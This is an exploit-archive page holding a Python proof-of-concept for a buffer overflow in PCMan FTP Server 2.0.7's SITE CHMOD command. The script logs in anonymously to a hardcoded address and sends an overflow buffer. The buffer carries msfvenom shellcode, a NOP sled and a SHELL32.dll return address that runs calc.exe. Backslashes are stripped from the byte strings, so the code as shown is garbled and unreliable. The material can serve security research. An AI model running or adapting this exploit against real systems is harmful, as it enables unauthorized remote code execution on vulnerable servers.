PCMan FTP Server 2.0.7 SITE CHMOD Buffer Overflow
Posted on 05 November 2016
#!/usr/bin/env python #-*- coding: utf-8 -*- # Exploit Title: PCMan FTP Server 2.0 BoF SITE CHMOD Command # Date: 04/11/2016 # Exploit Author: Luis Noriega # Tested on: Windows XP Profesional V. 5.1 Service Pack 3 # CVE : n/a import socket # shellcode with metasploit: # msfvenom -p windows/exec CMD=calc.exe -b'x00x0Ax0D' -f c ret = "xD7x30x6Bx7E" #SHELL32.dll shellcode = ("xdbxd6xbfx70x7bxf3x98xd9x74x24xf4x5ax29xc9xb1" "x31x31x7ax18x03x7ax18x83xc2x74x99x06x64x9cxdf" "xe9x95x5cx80x60x70x6dx80x17xf0xddx30x53x54xd1" "xbbx31x4dx62xc9x9dx62xc3x64xf8x4dxd4xd5x38xcf" "x56x24x6dx2fx67xe7x60x2exa0x1ax88x62x79x50x3f" "x93x0ex2cxfcx18x5cxa0x84xfdx14xc3xa5x53x2fx9a" "x65x55xfcx96x2fx4dxe1x93xe6xe6xd1x68xf9x2ex28" "x90x56x0fx85x63xa6x57x21x9cxddxa1x52x21xe6x75" "x29xfdx63x6ex89x76xd3x4ax28x5ax82x19x26x17xc0" "x46x2axa6x05xfdx56x23xa8xd2xdfx77x8fxf6x84x2c" "xaexafx60x82xcfxb0xcbx7bx6axbaxe1x68x07xe1x6f" "x6ex95x9fxddx70xa5x9fx71x19x94x14x1ex5ex29xff" "x5bx90x63xa2xcdx39x2ax36x4cx24xcdxecx92x51x4e" "x05x6axa6x4ex6cx6fxe2xc8x9cx1dx7bxbdxa2xb2x7c" "x94xc0x55xefx74x29xf0x97x1fx35") buffer = 'x90'*30 + shellcode buffer2 = 'x41' * 2001 + ret + buffer + 'x43'*(749-len(buffer)) print "Sending Buffer" s = socket.socket(socket.AF_INET, socket. SOCK_STREAM) connect = s.connect(('192.168.1.150', 21)) s.recv(1024) s.send('USER anonymous ') s.recv(1024) s.send('PASS anonymous ') s.recv(1024) s.send('SITE CHMOD' + buffer2 + ' ') s.close()
